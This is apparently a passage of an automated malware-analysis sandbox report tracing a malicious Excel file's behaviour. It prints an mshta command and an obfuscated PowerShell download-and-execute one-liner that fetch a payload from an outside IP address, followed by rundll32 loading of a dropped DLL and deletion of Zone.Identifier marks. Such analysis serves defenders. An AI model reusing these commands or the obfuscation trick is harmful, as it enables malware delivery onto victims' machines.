                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Wlnljconerohcjaz\cekfidpy.yhq",DllRegisterServer
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Gdtjuon\eryfdrtz.qpz",NSMcfMaGRbKFCL
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Gdtjuon\eryfdrtz.qpz",DllRegisterServer
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Mqenzhvktn\czphbxmqtcm.nzb",NscZMRYpRiE
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Mqenzhvktn\czphbxmqtcm.nzb",DllRegisterServer
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Oyfgrjdbgbuk\aagpsdybai.shx",DwOwDiNvSb
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Oyfgrjdbgbuk\aagpsdybai.shx",DllRegisterServer
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c mshta http://91.240.118.168/qqw/aas/se.htmlJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta http://91.240.118.168/qqw/aas/se.htmlJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/qqw/aas/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll AADDJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll AADDJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\QWER.dll",DllRegisterServerJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Wlnljconerohcjaz\cekfidpy.yhq",MOdnuTnMIiJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Wlnljconerohcjaz\cekfidpy.yhq",DllRegisterServerJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Gdtjuon\eryfdrtz.qpz",NSMcfMaGRbKFCLJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Gdtjuon\eryfdrtz.qpz",DllRegisterServerJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Mqenzhvktn\czphbxmqtcm.nzb",NscZMRYpRiEJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Mqenzhvktn\czphbxmqtcm.nzb",DllRegisterServerJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Oyfgrjdbgbuk\aagpsdybai.shx",DwOwDiNvSbJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Oyfgrjdbgbuk\aagpsdybai.shx",DllRegisterServerJump to behavior
                            Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVREE44.tmpJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll AADD
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                            Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                            Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
                            Source: Window RecorderWindow detected: More than 3 window changes detected
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dllJump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                            Source: 54C4.tmp.0.drInitial sample: OLE indicators vbamacros = False
                            Source: C:\Windows\System32\mshta.exeCode function: 4_3_029408CA push 8B49024Bh; iretd 4_3_029408CF
                            Source: C:\Windows\System32\mshta.exeCode function: 4_3_029400BC push 8B49024Bh; iretd 4_3_029400C2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10032B7D push ecx; ret 9_2_10032B90
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10030DFF push ecx; ret 9_2_10030E12
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0017114C push ds; ret 9_2_0017114D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001715F5 push cs; retf 9_2_001715FE
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0022114C push ds; ret 10_2_0022114D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002215F5 push cs; retf 10_2_002215FE
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10032B7D push ecx; ret 11_2_10032B90
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10030DFF push ecx; ret 11_2_10030E12
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B114C push ds; ret 11_2_001B114D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B15F5 push cs; retf 11_2_001B15FE
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0077114C push ds; ret 12_2_0077114D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007715F5 push cs; retf 12_2_007715FE
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_005F114C push ds; ret 14_2_005F114D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_005F15F5 push cs; retf 14_2_005F15FE
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_001D114C push ds; ret 15_2_001D114D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_001D15F5 push cs; retf 15_2_001D15FE
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003D873 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer,9_2_1003D873
                            Source: QWER.dll.6.drStatic PE information: real checksum: 0x8f55d should be: 0x94fc5
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\QWER.dllJump to dropped file
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\QWER.dllJump to dropped file
                            Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Wlnljconerohcjaz\cekfidpy.yhq (copy)Jump to dropped file
                            Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Wlnljconerohcjaz\cekfidpy.yhq (copy)Jump to dropped file

                            Hooking and other Techniques for Hiding and Protection

                            barindex
                            Hides that the sample has been downloaded from the Internet (zone.identifier)
                            Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Wlnljconerohcjaz\cekfidpy.yhq:Zone.Identifier read attributes | deleteJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Gdtjuon\eryfdrtz.qpz:Zone.Identifier read attributes | deleteJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Mqenzhvktn\czphbxmqtcm.nzb:Zone.Identifier read attributes | deleteJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Oyfgrjdbgbuk\aagpsdybai.shx:Zone.Identifier read attributes | deleteJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100134F0 IsIconic,9_2_100134F0
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10018C9A IsIconic,GetWindowPlacement,GetWindowRect,9_2_10018C9A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_100134F0 IsIconic,11_2_100134F0
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10018C9A IsIconic,GetWindowPlacement,GetWindowRect,11_2_10018C9A
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exe TID: 1496Thread sleep time: -180000s >= -30000sJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeAPI coverage: 3.2 %
                            Source: C:\Windows\SysWOW64\rundll32.exeAPI coverage: 3.2 %
                            Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_9-32031
                            Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_11-32031
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                            Source: powershell.exe, 00000006.00000002.682247362.00000000002C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10030334 VirtualQuery,GetSystemInfo,__invoke_watson,GetModuleHandleA,GetProcAddress,VirtualAlloc,VirtualProtect,9_2_10030334
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,9_2_10021854
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,11_2_10021854
                            Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003D873 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer,9_2_1003D873
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0018D374 mov eax, dword ptr fs:[00000030h]9_2_0018D374
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0023D374 mov eax, dword ptr fs:[00000030h]10_2_0023D374
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001CD374 mov eax, dword ptr fs:[00000030h]11_2_001CD374
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0078D374 mov eax, dword ptr fs:[00000030h]12_2_0078D374
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0060D374 mov eax, dword ptr fs:[00000030h]14_2_0060D374
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_001ED374 mov eax, dword ptr fs:[00000030h]15_2_001ED374
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_10037657
